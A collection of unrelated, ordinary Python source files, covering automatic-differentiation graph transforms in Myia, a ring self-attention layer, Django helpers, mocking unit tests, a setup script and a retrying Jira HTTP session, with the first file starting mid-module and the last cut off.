class SensRemapper(GradRemapper):
    """Generate the sensitivities in the backward graph.
    This is transform E.
    x, used by y at index i and z at index j =>
        E:x = D:y[i] + D:z[j]
    """
    def gen_parameter(self, g, ng, p):
        """Generate nodes for parameter sensitivities.
        This graph is reversed, so parameter sensitivities are outputs,
        not parameters of ng.
        """
        self.gen_apply(g, ng, p)
    def gen_apply(self, g, ng, node):
        """Generate sensitivities for applications.
        * The output node's sensitivity is ng's sole parameter.
        * If a node is used in multiple graphs, each graph has a
          corresponding sensitivity node.
        """
        with About(node.debug, self.relation):
            if node is g.output:
                new_node = ng.add_parameter()
            else:
                new_node = ng.apply()
        # NOTE: First parameter to remap_node is (g, node) instead of just
        # node. This lets us dispatch to a different node depending on whether
        # it belongs to the graph that uses it, or is a free variable.
        self.remap_node((g, node), g, node, ng, new_node)
    def gen_child(self, g, ng, child):
        """Generate sensitivities for child graphs."""
        with About(child.debug, self.relation):
            self.remap_node((g, child), g, child, ng, ng.apply())
    def gen_fv_extended(self, g, ng, node):
        """Generate sensitivities for free variables.
        Note that the default gen_fv_extended does nothing, so this is
        different behavior.
        """
        with About(node.debug, self.relation):
            self.remap_node((g, node), g, node, ng, ng.apply())
    def gen_fv_graph(self, g, ng, g2):
        """Generate sensitivities for free variables that are graphs."""
        with About(g2.debug, self.relation):
            self.remap_node((g, g2), g, g2, ng, ng.apply())
    def link_apply(self, link):
        """Link generated nodes to their inputs.
        x, used by y at index i and z at index j =>
            E:x = D:y[i] + D:z[j]
        """
        g = link.graph
        ng = link.new_graph
        node = link.node
        new_node = link.new_node
        mng = g.manager
        assert not new_node.is_parameter()
        if isinstance(node, Graph):
            # This was added via gen_child or gen_fv_graph.
            # Collect uses of every constant that refers to this graph.
            uses = OrderedSet()
            for ct in g.constants:
                if ct.value is node:
                    uses |= mng.uses[ct]
        else:
            uses = mng.uses[node]
        contribs = []
        for user, key in uses:
            if user.graph is g:
                # We only concern ourselves with uses in this graph
                if user is user.graph.return_:
                    # This is the graph's output, so the contribution
                    # is the output sensitivity, which is contained in
                    # ng's sole parameter.
                    if len(ng.parameters) == 0:
                        # This will happen if the graph returns a free
                        # variable directly.
                        with About(g.output.debug, "grad_sens"):
                            ng.add_parameter()
                    # We need to call identity because we need to modify
                    # new_node's inputs at the end of the function, we can't
                    # simply replace it.
                    sexp = (P.identity, ng.parameters[0])
                    contribs.append(sexp)
                else:
                    # If the application is e.g. z = f(x, y), BPropAppRemapper
                    # calculates the tuple (df, dx, dy) = backpropagator_f(dz)
                    # If we are processing node f, x or y, we will respectively
                    # get element 0, 1 or 2 of that tuple and add that to our
                    # contribs list.
                    src = self.remappers["grad_bprop_app"].get(g, user)
                    sexp = (P.tuple_getitem, src, key)
                    contribs.append(sexp)
        # TODO: deconstruct nested graphs
        # TODO: figure out what I meant by "deconstruct nested graphs" :(
        # These are all the graphs nested in g which have this node as a
        # free variable. Each of these graphs has a sensitivity node, and
        # we will extract contributions from them.
        children = {
            g2
            for g2 in self.graphs
            if (g, g2) in self.repl and node in g2.free_variables_extended
        }
        # This is equivalent to the original node. Note that we aren't really
        # interested in the node's value: jinv is used along with embed and
        # zeros_like, which only care about the original node's inferred type
        # and shape.
        jinv = self.grad_fprop.get_jinv(node)
        # This represents the node's "key" into the env.
        embed = sexp_to_node((operations.embed, jinv), ng)
        # This is the default, if there is no entry for this key.
        zl = sexp_to_node((zeros_like, jinv), ng)
        for child in children:
            assert (g, child) in self.repl
            sexp = (P.env_getitem, self.get(g, child), embed, zl)
            contribs.append(sexp)
        n = len(contribs)
        if n == 0:
            # No uses at all: the sensitivity is just zeros_like.
            sexp = zl
        else:
            # All contributions are added together with gadd.
            def mkadd(x, y):
                return (gadd, x, y)
            sexp = reduce(mkadd, contribs)
        new_node.inputs = sexp_to_node(sexp, ng).inputs
    @property
    def grad_fprop(self):
        """The forward-graph (transform B) remapper."""
        return self.remappers["grad_fprop"]
    def finalize_graph(self, g, ng):
        """Generate the output of the backprop graph.
        * Sensitivities for all free variables are packed in an
          EnvInstance using env_setitem.
        * We return a tuple with fv sensitivities first, and then
          all parameter sensitivities.
        """
        fv_sens = Constant(newenv)
        for fv in g.free_variables_extended:
            sens = self.get(g, fv)
            if sens.is_apply(zeros_like):
                # Skip if there is no gradient
                continue
            fv_sens = ng.apply(
                P.env_setitem,
                fv_sens,
                ng.apply(operations.embed, self.grad_fprop.get_jinv(fv)),
                sens,
            )
        in_sens = [self.get(g, p) for p in g.parameters]
        ng.output = ng.apply(P.make_tuple, fv_sens, *in_sens)
        if len(ng.parameters) == 0:
            # This can happen if the output is a constant. In that case we just
            # add a dummy parameter to satisfy the backpropagator protocol.
            with About(g.output.debug, "grad_sens"):
                ng.add_parameter()
def _grad(root):
    """Run the J transform over *root*'s scope and return its fprop graph."""
    remapper_set = RemapperSet(
        root.scope,
        grad_fprop=FPropRemapper.partial(),
        grad_fprop_app=FPropAppRemapper.partial(master="grad_fprop"),
        grad_bprop=BPropRemapper.partial(master="grad_fprop"),
        grad_sens=SensRemapper.partial(graph_relation="grad_bprop"),
        grad_bprop_app=BPropAppRemapper.partial(master="grad_sens"),
    )
    remapper_set.run()
    return remapper_set["grad_fprop"].get_graph(root)
@ovld
def Jimpl(prim: Primitive, resources, node):
    """Implement J on a Primitive.

    Looks up the registered backpropagator graph for *prim* and converts it.

    Raises:
        InternalInferenceError: if no backpropagator is registered (missing
            key or a None entry).
    """
    try:
        g = resources.grad_implementations[prim]
    except KeyError:  # pragma: no cover
        # FIX: `g` was previously left unbound on this path, so the error
        # branch below raised NameError instead of the intended
        # InternalInferenceError.
        g = None
    if g is None:
        raise InternalInferenceError(
            f"Missing a backpropagator for primitive '{prim}'", refs=[node]
        )
    return resources.convert(g, manage=False)
@ovld  # noqa: F811
def Jimpl(graph: Graph, resources, node):
    """J of a graph is its gradient-transformed (fprop) graph."""
    return _grad(graph)
@ovld  # noqa: F811
def Jimpl(other: object, resources, node):
    """Fallback overload: J is not implemented on non-functions here."""
    name = type(other).__qualname__
    raise NotImplementedError(f"J(::{name}) not implemented")
###############################
# Helpers to define gradients #
###############################
# Flags applied to every generated gradient graph.
default_grad_flags = {"ignore_values": True, "core": True, "reference": True}
# Patterns used to validate the shape of a bprop graph's output:
# a make_tuple call (via resolve, or direct) or a raise.
_is_mktuple_resolve = ((operations.resolve, operations_ns, "make_tuple"), Xs)
_is_mktuple_direct = (P.make_tuple, Xs)
_is_raise = (P.raise_, Xs)
def _make_grad_transform(prim, fn, flags):
    """Given a function for the bprop, make the augmented function.

    Args:
        prim: the primitive the bprop is for.
        fn: the Python bprop function; its last two parameters are the
            primal output and the output sensitivity (dout).
        flags: extra flags to set on the generated fprop graph.

    Returns:
        The cloned augmented (fprop) graph, whose output is
        ``(J(primal_output), bprop)``.
    """
    from .pipeline import standard_parse
    info = NamedDebugInfo(prim=prim, name=prim.name)
    bprop = clone(standard_parse(fn))
    bprop.flags.update(default_grad_flags)
    bprop.debug.name = None
    bprop.debug.about = About(info, "grad_bprop") # type: ignore
    # The bprop must either raise, or return a tuple literal; in the tuple
    # case we prepend the (empty) environment for free-variable sensitivities.
    if bprop.output.match(_is_raise):
        pass
    elif bprop.output.match(_is_mktuple_resolve) or bprop.output.match(
        _is_mktuple_direct
    ):
        bprop.output = bprop.apply(
            P.make_tuple, newenv, *bprop.output.inputs[1:]
        )
    else:
        raise InternalInferenceError(
            f"The backpropagator for {prim} is not defined properly. "
            f"It should return a tuple literal.",
            refs=[bprop.return_],
        )
    # The last two bprop parameters are the primal output and dout.
    *args, out_param, dout = bprop.parameters
    with About(info, "grad_fprop"):
        outer = Graph()
    outer.flags.update(default_grad_flags)
    outer.flags.update(flags)
    outer.transforms["primal"] = prim
    outer.output = Constant(None)
    mng = manage(bprop, outer)
    # For each primal argument, add a J-typed parameter on the outer graph
    # and replace uses of the original parameter with Jinv(outer parameter).
    transf_args = []
    for p in args:
        with About(p.debug, "grad_fprop"):
            outer_p = outer.add_parameter()
        with About(p.debug, "equiv"):
            transf_p = outer.apply(P.Jinv, outer_p)
        mng.replace(p, transf_p)
        transf_args.append(transf_p)
    # Recompute the primal output inside the outer graph and substitute it
    # for the bprop's out parameter.
    with About(out_param.debug, "equiv"):
        out_value = outer.apply(prim, *transf_args)
    mng.replace(out_param, out_value)
    with About(out_param.debug, "grad_sens"):
        new_dout = bprop.add_parameter()
    mng.replace(dout, new_dout)
    # We remove all parameters except new_dout
    bprop.parameters = [new_dout]
    result = outer.apply(P.J, out_value)
    outer.output = outer.apply(P.make_tuple, result, bprop)
    return clone(outer)
def wrap_grad_transform(prim):
    """Wrap the grad transform for prim."""
    from .pipeline import standard_parse

    def deco(fn):
        graph = standard_parse(fn)
        # Rename every graph in the parsed function's scope, substituting
        # the grad symbols for the __fprop__/__bprop__ markers.
        for sub in manage(graph, weak=True).graphs:
            label = short_labeler.name(sub)
            label = label.replace("__fprop__", syms["grad_fprop"])
            label = label.replace("__bprop__", syms["grad_bprop"])
            sub.debug.name = label
            sub.flags.update(default_grad_flags)
        graph.transforms["primal"] = prim
        return graph

    return deco
def bprop_to_grad_transform(prim, **flags):
    """Create the grad transform of a function from a bprop function."""

    def _decorator(bprop_fn):
        return _make_grad_transform(prim, bprop_fn, flags)

    return _decorator
# NOTE(review): purpose of __consolidate__ is not visible in this file —
# presumably a flag read by module-consolidation tooling; confirm.
__consolidate__ = True
# Public API of this module.
__all__ = ["Jimpl", "bprop_to_grad_transform", "wrap_grad_transform"]
|
from torch2trt.torch2trt import *
from .ReLU import *
@tensorrt_converter('torch.nn.functional.relu')
def convert_relu(ctx):
    """Convert F.relu by delegating to the nn.ReLU module converter."""
    # Prepend a ReLU module instance so convert_ReLU sees the argument
    # layout it expects (module first, then the original args).
    ctx.method_args = (torch.nn.ReLU(), *ctx.method_args)
    convert_ReLU(ctx)
# coding=utf-8
import datetime
from django import template
register = template.Library()
@register.filter
def attr_from_domain_id(attrs, domain_id):
    """Template filter: first attribute matching ``domain_id``, or None.

    Args:
        attrs: queryset of attribute objects.
        domain_id: domain identifier to filter on.
    """
    # FIX (perf): the previous `attrs.first() if attrs else None` evaluated
    # the whole queryset for the truthiness check (an extra DB query);
    # QuerySet.first() already returns None when the queryset is empty.
    return attrs.filter(domain_id=domain_id).first()
|
from unittest import TestCase, main
from requests.exceptions import Timeout
from unittest.mock import Mock, patch
from src.mytest.mocking.my_calendar import requests, protocol
from src.mytest.mocking.my_calendar import get_holidays
target_url = 'http://localhost/api/holidays'

def log_request(obj):
    """Print request-log lines and return a canned 200 response mock."""
    print(f"Making a request to {target_url}")
    print(f"Request received!")
    # Build the mock in one shot: attribute and return-value specs are
    # passed as configuration kwargs instead of assigned one by one.
    return Mock(**{
        'status_code': 200,
        'json.return_value': {
            '12/25': 'Christmas',
            '5/5': "Children's Day"
        },
    })
class TestCalendar(TestCase):
    """Demonstrates mocking the `requests` module used by my_calendar."""
    @patch('src.mytest.mocking.my_calendar.requests')
    def test_get_holidays_timeout(self, mock_requests):
        """A Timeout from requests.get must propagate out of get_holidays."""
        mock_requests.get.side_effect = Timeout
        with self.assertRaises(Timeout):
            get_holidays()
    def test_get_holidays_logging(self):
        """Same patch applied via context manager instead of a decorator."""
        with patch('src.mytest.mocking.my_calendar.requests') as mock_requests:
            holidays = {
                '12/25': 'Christmas',
                '5/5': "Children's Day"
            }
            def response_mock(args):
                # Each call to requests.get yields a fresh 200 response mock.
                return Mock(**{'status_code': 200, 'json.return_value': holidays})
            mock_requests.get.side_effect = response_mock
            self.assertEqual(get_holidays()['12/25'], "Christmas")
            self.assertEqual(mock_requests.get.call_count, 1)
    # side_effect list is consumed in order: first call raises, second
    # returns the response mock produced by log_request.
    @patch.object(requests, 'get', side_effect=[Timeout, log_request("any")])
    def test_get_holiday_retry(self, mock_get):
        with self.assertRaises(Timeout):
            get_holidays()
        self.assertEqual(get_holidays()['12/25'], "Christmas")
        self.assertEqual(mock_get.call_count, 2)
    @patch.object(requests, 'get', side_effect=["start", "busy", "completed", "idle"])
    def test_protocol(self, mock_get):
        """protocol() is expected to call requests.get exactly three times."""
        protocol()
        self.assertEqual(mock_get.call_count, 3)
# Allow running this test module directly.
if __name__ == '__main__':
    main()
|
from django.http import HttpRequest, HttpResponse
from hermes.forms.models import Form, Site, Submission
from hermes.hooks.mail.email import render_submission_body
def debug_submission_email(request: HttpRequest, *args, **kwargs) -> HttpResponse:
    """Render and return the HTML email body for a debug test submission."""
    debug_site, _created = Site.objects.get_or_create(
        name="test site", url="https://example.com", user=request.user
    )
    debug_form, _created = Form.objects.get_or_create(name="test form", site=debug_site)
    latest = debug_form.submission_set.first()
    if latest is None:
        # No submissions yet: fabricate one so the template has data.
        latest = Submission.objects.create(
            form=debug_form,
            data={"name": "Testy", "message": "This is a test message"},
        )
    _subject, body = render_submission_body(submission=latest)
    return HttpResponse(body.html)
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import math
import colossalai
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.nn import Parameter
from colossalai.context.parallel_mode import ParallelMode
from colossalai.core import global_context as gpc
from colossalai.nn.layer.parallel_sequence._operation import RingQK, RingAV
from colossalai.registry import LAYERS
from colossalai.kernel.cuda_native.scaled_softmax import AttnMaskType
from colossalai.kernel import FusedScaleMaskSoftmax
from colossalai.context import seed
@LAYERS.register_module
class TransformerSelfAttentionRing(nn.Module):
    """Parallel self-attention layer abstract class.
    Self-attention layer takes input with size [b, s, h]
    and returns output of the same size.
    Args:
        hidden_size (int): hidden size.
        num_attention_heads (int): number of attention heads.
        attention_dropout (float): dropout probability for attention layer.
        attention_mask_func (:class:`typing.Callable`): Mask function to be applied.
        layer_number (int): number of layers.
    """
    def __init__(self,
                 hidden_size,
                 num_attention_heads,
                 attention_dropout,
                 attention_mask_func,
                 layer_number,
                 apply_query_key_layer_scaling: bool = False,
                 convert_fp16_to_fp32_in_softmax: bool = False,
                 attn_mask_type=AttnMaskType.padding,
                 masked_softmax_fusion=True,
                 fp16=False,
                 bf16=False
                 ):
        super().__init__()
        self.convert_fp16_to_fp32_in_softmax = convert_fp16_to_fp32_in_softmax
        self.apply_query_key_layer_scaling = apply_query_key_layer_scaling
        self.attention_mask_func = attention_mask_func
        self.layer_number = layer_number
        self.hidden_size = hidden_size
        self.num_attention_heads = num_attention_heads
        self.attn_mask_type = attn_mask_type
        assert self.layer_number > 0
        # NOTE: this float is overwritten below with an nn.Dropout module;
        # the probability is only used to construct that module.
        self.attention_dropout = attention_dropout
        if self.apply_query_key_layer_scaling:
            # Layer scaling requires the softmax to run in fp32.
            self.convert_fp16_to_fp32_in_softmax = True
        assert self.hidden_size % self.num_attention_heads == 0, \
            'hidden size is not divisible by the number of attention heads'
        self.hidden_size_per_attention_head = self.hidden_size // num_attention_heads
        # Size of the sequence-parallel process group.
        self.world_size = gpc.get_world_size(ParallelMode.SEQUENCE)
        # Strided linear layer.
        self.query_key_value = _Linear(
            hidden_size,
            3 * self.hidden_size,
        )
        self.coeff = None
        self.norm_factor = math.sqrt(self.hidden_size)
        if self.apply_query_key_layer_scaling:
            # Scale scores by the layer number (undone inside the softmax).
            self.coeff = layer_number
            self.norm_factor *= self.coeff
        self.scale_mask_softmax = FusedScaleMaskSoftmax(
            fp16, bf16,
            self.attn_mask_type,
            masked_softmax_fusion,
            self.attention_mask_func,
            self.convert_fp16_to_fp32_in_softmax,
            self.coeff)
        self.attention_dropout = nn.Dropout(attention_dropout)
        # Output.
        self.dense = _Linear(hidden_size,
                             hidden_size,
                             bias=True,
                             skip_bias_add=True)
    def forward(self, hidden_states, attention_mask):
        """Run ring self-attention over the local sub-sequence.

        Args:
            hidden_states: [sub_seq_len, batch_size, hidden_size].
            attention_mask: [batch_size, 1, sub_seq_len, seq_len].

        Returns:
            (output, bias): dense projection of the context and its bias
            (returned separately because ``skip_bias_add=True``).
        """
        # hidden_states: [sub_seq_len, batch_size, hidden_size]
        # attention_mask: [batch_size, 1, sub_seq_len, seq_len]
        sub_seq_length, batch_size, hidden_size = hidden_states.size()
        # =====================
        # Query, Key, and Value
        # =====================
        # Attention heads shape change:
        # [sub_seq_len, batch_size, hidden_size] --> [sub_seq_len, batch_size, (3 * head_size * num_heads)]
        mixed_x_layer = self.query_key_value(hidden_states)
        # [sub_seq_len, batch_size, num_heads, 3 * head_size] --> 3 [sub_seq_len, batch_size, num_heads, head_size]
        new_tensor_shape = mixed_x_layer.size()[:-1] + (self.num_attention_heads,
                                                        3 * self.hidden_size_per_attention_head)
        mixed_x_layer = mixed_x_layer.view(*new_tensor_shape)
        # split into query, key and value
        last_dim = mixed_x_layer.dim() - 1
        last_dim_value = mixed_x_layer.size(-1)
        assert last_dim_value % 3 == 0, 'the last dimension is not a multiple of 3, ' \
                                        'cannot be divided into query, key and value'
        partition_size = last_dim_value // 3
        (query_layer, key_layer, value_layer) = torch.split(
            mixed_x_layer, partition_size, dim=last_dim)
        # attention scores: [batch_size, num_heads, sub_seq_len, seq_len]
        # seq_len is the *global* sequence length: local key length x world size.
        output_size = (query_layer.size(1),
                       query_layer.size(2),
                       query_layer.size(0),
                       key_layer.size(0) * self.world_size)
        # [sub_seq_len, batch_size, num_heads, head_size] -> [sub_seq_len, batch_size * num_heads, head_size]
        query_layer = query_layer.view(output_size[2],
                                       output_size[0] * output_size[1], -1)
        # [sub_seq_len, batch_size, num_heads, head_size] -> [sub_seq_len, batch_size * num_heads, head_size]
        key_layer = key_layer.view(key_layer.size(0),
                                   output_size[0] * output_size[1], -1)
        # attention_scores: [batch_size * num_heads, sub_seq_len, seq_len]
        # RingQK exchanges key blocks across the sequence-parallel ranks.
        attention_scores = RingQK.apply(
            query_layer.transpose(0, 1).contiguous(),  # [batch_size * num_heads, sub_seq_len, head_size]
            key_layer.transpose(0, 1).contiguous(),  # [batch_size * num_heads, sub_seq_len, head_size],
            batch_size,
            self.num_attention_heads,
            sub_seq_length
        )
        attention_scores /= self.norm_factor
        # change view to [batch_size, num_heads, sub_seq_len, seq_len]
        attention_scores = attention_scores.view(*output_size)
        # change shape to [batch_size, num_heads, sub_seq_len, seq_len]
        attention_probs = self.scale_mask_softmax(attention_scores, attention_mask)
        # This is actually dropping out entire tokens to attend to, which might
        # seem a bit unusual, but is taken from the original Transformer paper.
        with seed(ParallelMode.TENSOR):
            attention_probs = self.attention_dropout(attention_probs)
        # context layer shape: [batch_size, num_heads, sub_seq_len, head_size]
        output_size = (value_layer.size(1),
                       value_layer.size(2),
                       query_layer.size(0),
                       value_layer.size(3))
        # change view [sub_seq_len, batch_size * num_heads, head_size]
        value_layer = value_layer.contiguous().view(value_layer.size(0),
                                                    output_size[0] * output_size[1], -1)
        # # change view [b * num_heads, sub_seq_len, seq_len]
        attention_probs = attention_probs.view(attention_probs.size(0) * attention_probs.size(1),
                                               attention_probs.size(2),
                                               attention_probs.size(3))
        # matmul: [batch_size * num_heads, sub_seq_len, head_size]
        # RingAV exchanges value blocks across the sequence-parallel ranks.
        context_layer = RingAV.apply(
            attention_probs,
            value_layer.transpose(0, 1).contiguous(),
            batch_size,
            self.num_attention_heads,
            self.hidden_size_per_attention_head,
            sub_seq_length
        )
        # change view [batch_size, num_heads, sub_seq_len, head_size]
        context_layer = context_layer.view(*output_size)
        # [batch_size, num_heads, sub_seq_len, head_size] -> [sub_seq_len, batch_size, num_heads, head_size]
        context_layer = context_layer.permute(2, 0, 1, 3).contiguous()
        # [sub_seq_len, batch_size, num_heads, head_size] -> [sub_seq_len, batch_size, hidden_size]
        new_context_layer_shape = context_layer.size()[:-2] + (
            self.hidden_size_per_attention_head * self.num_attention_heads,)
        context_layer = context_layer.view(*new_context_layer_shape)
        output, bias = self.dense(context_layer)
        return output, bias
    def __repr__(self):
        return f'TransformerSelfAttentionRing(apply_query_key_layer_scaling={self.apply_query_key_layer_scaling}, ' \
               f'layer_number={self.layer_number}, hidden_size:{self.hidden_size}, attention_dropout={self.attention_dropout}, ' \
               f'attn_mask_type={self.attn_mask_type}, num_attention_heads={self.num_attention_heads}, ' \
               f'hidden_size_per_attention_head={self.hidden_size_per_attention_head}, coeff={self.coeff}, norm_factor={self.norm_factor}, ' \
               f'convert_fp16_to_fp32_in_softmax={self.convert_fp16_to_fp32_in_softmax})'
class _Linear(nn.Module):
    """Linear layer with column parallelism.

    The linear layer is defined as Y = XA + b. A is parallelized along
    its second dimension as A = [A_1, ..., A_p].

    Arguments:
        input_size: first dimension of matrix A.
        output_size: second dimension of matrix A.
        bias: If true, add bias (initialized to zero).
        skip_bias_add: This was added to enable performance optimations where bias
                       can be fused with other elementwise operations. we skip
                       adding bias but instead return it.
    """

    def __init__(self,
                 input_size,
                 output_size,
                 bias=True,
                 skip_bias_add=False):
        # Modernized from super(_Linear, self).__init__() — the file is
        # Python 3 (f-strings), so the zero-argument form is preferred.
        super().__init__()
        # Keep input parameters
        self.input_size = input_size
        self.output_size = output_size
        self.skip_bias_add = skip_bias_add
        # Weight is stored transposed relative to Y = XA, as F.linear expects.
        self.weight = Parameter(torch.empty(self.output_size, self.input_size))
        nn.init.xavier_normal_(self.weight)
        if bias:
            self.bias = Parameter(torch.empty(self.output_size))
            # Always initialize bias to zero.
            with torch.no_grad():
                self.bias.zero_()
        else:
            self.register_parameter('bias', None)

    def forward(self, input_):
        """Apply the affine map; returns (output, bias) when skip_bias_add."""
        # When skipping the bias add, do the matmul without it and hand the
        # bias back to the caller for later fusion.
        bias = None if self.skip_bias_add else self.bias
        output = F.linear(input_, self.weight, bias)
        if self.skip_bias_add:
            return output, self.bias
        return output

    def __repr__(self):
        return f'Linear(in_features={self.input_size}, out_features={self.output_size}, ' + \
               f'bias={self.bias is not None}, skip_bias_add={self.skip_bias_add})'
|
from setuptools import setup, find_namespace_packages
from tethys_apps.app_installation import find_resource_files
### Apps Definition ###
app_package = 'embalses'
release_package = 'tethysapp-' + app_package
# -- Get Resource File -- #
# Collect non-Python files (templates, static assets, workspaces) so they
# are bundled with the installed package.
resource_files = find_resource_files('tethysapp/' + app_package + '/templates', 'tethysapp/' + app_package)
resource_files += find_resource_files('tethysapp/' + app_package + '/public', 'tethysapp/' + app_package)
resource_files += find_resource_files('tethysapp/' + app_package + '/workspaces', 'tethysapp/' + app_package)
### Python Dependencies ###
# NOTE(review): intentionally empty — presumably dependencies are provided
# by the hosting Tethys environment; confirm before adding any here.
dependencies = []
setup(
    name=release_package,
    version='1.0.0',
    description='An application for forecasting future reservoir levels in the Dominican Republic',
    long_description='Uses the Streamflow Prediction Tool, user supplied water release information, and rule curves to '
                     'forecast the levels of any reservoir in the Domincan Republic. Developed in 2018 and 2019 by two '
                     'groups of BYU Civil Engineering Capstone students.',
    keywords='Reservoir',
    author='Riley Hales',
    author_email='',
    url='https://www.github.com/rileyhales/embalses',
    license='MIT License',
    packages=find_namespace_packages(),
    package_data={'': resource_files},
    include_package_data=True,
    zip_safe=False,
    install_requires=dependencies,
)
|
import json
import logging
import random
import time
from typing import Callable, Optional, Union, cast
from requests import Response, Session
from requests.exceptions import ConnectionError
from jira.exceptions import JIRAError
logging.getLogger("jira").addHandler(logging.NullHandler())
def raise_on_error(r: Optional[Response], verb="???", **kwargs):
    """Handle errors from a Jira Request

    Args:
        r (Optional[Response]): Response from Jira request
        verb (Optional[str]): Request type, e.g. POST. Defaults to "???".

    Raises:
        JIRAError: If Response is None
        JIRAError: for 4xx/5xx status codes (with the best error message
            that can be extracted from the body).
        JIRAError: for any other status code outside 200/201/202/204.
    """
    request = kwargs.get("request", None)
    # headers = kwargs.get('headers', None)
    if r is None:
        raise JIRAError(None, **kwargs)
    if r.status_code >= 400:
        # Try progressively to extract a human-readable error message from
        # the response, falling back to the raw body text.
        error = ""
        if r.status_code == 403 and "x-authentication-denied-reason" in r.headers:
            error = r.headers["x-authentication-denied-reason"]
        elif r.text:
            try:
                response = json.loads(r.text)
                if "message" in response:
                    # Jira 5.1 errors
                    error = response["message"]
                elif "errorMessages" in response and len(response["errorMessages"]) > 0:
                    # Jira 5.0.x error messages sometimes come wrapped in this array
                    # Sometimes this is present but empty
                    errorMessages = response["errorMessages"]
                    if isinstance(errorMessages, (list, tuple)):
                        error = errorMessages[0]
                    else:
                        error = errorMessages
                # Catching only 'errors' that are dict. See https://github.com/pycontribs/jira/issues/350
                elif (
                    "errors" in response
                    and len(response["errors"]) > 0
                    and isinstance(response["errors"], dict)
                ):
                    # Jira 6.x error messages are found in this array.
                    error_list = response["errors"].values()
                    error = ", ".join(error_list)
                else:
                    error = r.text
            except ValueError:
                # Body was not valid JSON.
                error = r.text
        raise JIRAError(
            error,
            status_code=r.status_code,
            url=r.url,
            request=request,
            response=r,
            **kwargs,
        )
    # for debugging weird errors on CI
    if r.status_code not in [200, 201, 202, 204]:
        raise JIRAError(
            status_code=r.status_code, request=request, response=r, **kwargs
        )
    # testing for the bug exposed on
    # https://answers.atlassian.com/questions/11457054/answers/11975162
    # Deliberately a no-op here; the matching check lives in
    # ResilientSession.__recoverable, which treats it as retryable.
    if (
        r.status_code == 200
        and len(r.content) == 0
        and "X-Seraph-LoginReason" in r.headers
        and "AUTHENTICATED_FAILED" in r.headers["X-Seraph-LoginReason"]
    ):
        pass
class ResilientSession(Session):
    """This class is supposed to retry requests that do return temporary errors.
    At this moment it supports: 502, 503, 504
    """
    def __init__(self, timeout=None):
        # max_retries: retry attempts per request.
        # max_retry_delay: cap (seconds) on the backoff delay.
        # timeout: per-request timeout forwarded to every verb call.
        self.max_retries = 3
        self.max_retry_delay = 60
        self.timeout = timeout
        super().__init__()
        # Indicate our preference for JSON to avoid https://bitbucket.org/bspeakmon/jira-python/issue/46 and https://jira.atlassian.com/browse/JRA-38551
        self.headers.update({"Accept": "application/json,*.*;q=0.9"})
    def __recoverable(
        self,
        response: Optional[Union[ConnectionError, Response]],
        url: str,
        request,
        counter: int = 1,
    ) -> bool:
        """Decide whether a failed request should be retried.

        Returns True after sleeping a jittered exponential backoff when the
        failure is considered recoverable, False otherwise.
        """
        msg = str(response)
        if isinstance(response, ConnectionError):
            logging.warning(
                f"Got ConnectionError [{response}] errno:{response.errno} on {request} {url}\n{vars(response)}\n{response.__dict__}"
            )
        if isinstance(response, Response):
            if response.status_code in [502, 503, 504, 401]:
                # 401 UNAUTHORIZED still randomly returned by Atlassian Cloud as of 2017-01-16
                msg = f"{response.status_code} {response.reason}"
                # 2019-07-25: Disabled recovery for codes above^
                return False
            elif not (
                response.status_code == 200
                and len(response.content) == 0
                and "X-Seraph-LoginReason" in response.headers
                and "AUTHENTICATED_FAILED" in response.headers["X-Seraph-LoginReason"]
            ):
                # Any other HTTP response is treated as non-recoverable.
                return False
            else:
                msg = "Atlassian's bug https://jira.atlassian.com/browse/JRA-41559"
        # Exponential backoff with full jitter.
        delay = min(self.max_retry_delay, 10 * 2**counter) * random.random()
        logging.warning(
            "Got recoverable error from %s %s, will retry [%s/%s] in %ss. Err: %s"
            % (request, url, counter, self.max_retries, delay, msg)
        )
        if isinstance(response, Response):
            logging.debug("response.headers: %s", response.headers)
            logging.debug("response.body: %s", response.content)
        time.sleep(delay)
        return True
    def __verb(
        self, verb: str, url: str, retry_data: Optional[Callable] = None, **kwargs
    ) -> Response:
        """Issue one HTTP ``verb`` request with retry handling.

        Args:
            verb: HTTP method name ("GET", "POST", ...).
            url: target URL.
            retry_data: callable producing a fresh data stream for retries
                (a consumed stream cannot be re-read).

        Returns:
            The successful (2xx) or final Response.
        """
        # Merge per-call headers on top of the session defaults.
        d = self.headers.copy()
        d.update(kwargs.get("headers", {}))
        kwargs["headers"] = d
        # if we pass a dictionary as the 'data' we assume we want to send json
        # data
        data = kwargs.get("data", {})
        if isinstance(data, dict):
            data = json.dumps(data)
        retry_number = 0
        exception = None
        response = None
        while retry_number <= self.max_retries:
            response = None
            exception = None
            try:
                method = getattr(super(), verb.lower())
                response = method(url, timeout=self.timeout, **kwargs)
                if response.status_code >= 200 and response.status_code <= 299:
                    return response
            except ConnectionError as e:
                logging.warning(f"{e} while doing {verb.upper()} {url}")
                exception = e
            retry_number += 1
            if retry_number <= self.max_retries:
                response_or_exception = response if response is not None else exception
                if self.__recoverable(
                    response_or_exception, url, verb.upper(), retry_number
                ):
                    if retry_data:
                        # if data is a stream, we cannot just read again from it,
                        # retry_data() will give us a new stream with the data
                        kwargs["data"] = retry_data()
                    continue
                else:
                    break
        if exception is not None:
            # The last attempt ended in a ConnectionError: re-raise it.
            raise exception
        raise_on_error(response, verb=verb, **kwargs)
        # after raise_on_error, only Response objects are allowed through
        response = cast(Response, response)  # tell mypy only Response-like are here
        return response
    def get(self, url: Union[str, bytes], **kwargs) -> Response:  # type: ignore
        return self.__verb("GET", str(url), **kwargs)
    def post(self, url: Union[str, bytes], data=None, json=None, **kwargs) -> Response:  # type: ignore
        return self.__verb("POST", str(url), data=data, json=json, **kwargs)
    def put(self, url: Union[str, bytes], data=None, **kwargs) -> Response:  # type: ignore
        return self.__verb("PUT", str(url), data=data, **kwargs)
    def delete(self, url: Union[str, bytes], **kwargs) -> Response:  # type: ignore
        return self.__verb("DELETE", str(url), **kwargs)
    def head(self, url: Union[str, bytes], **kwargs) -> Response:  # type: ignore
        return self.__verb("HEAD", str(url), **kwargs)
    def patch(self, url: Union[str, bytes], data=None, **kwargs) -> Response:  # type: ignore
        return self.__verb("PATCH", str(url), data=data, **kwargs)
    def options(self, url: Union[str, bytes], **kwargs) -> Response:  # type: ignore
        return self.__verb("OPTIONS", str(url), **kwargs)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
"""
Sonos-GUI-URI
This is the first attempt to create a window to stream a URI to the Sonos Speakers.
Author: Jim Scherer
"""
import Tkinter as tk
import ttk
# from ttk import Frame, Style, Label, Button, Entry
import tkMessageBox as mbox
import time
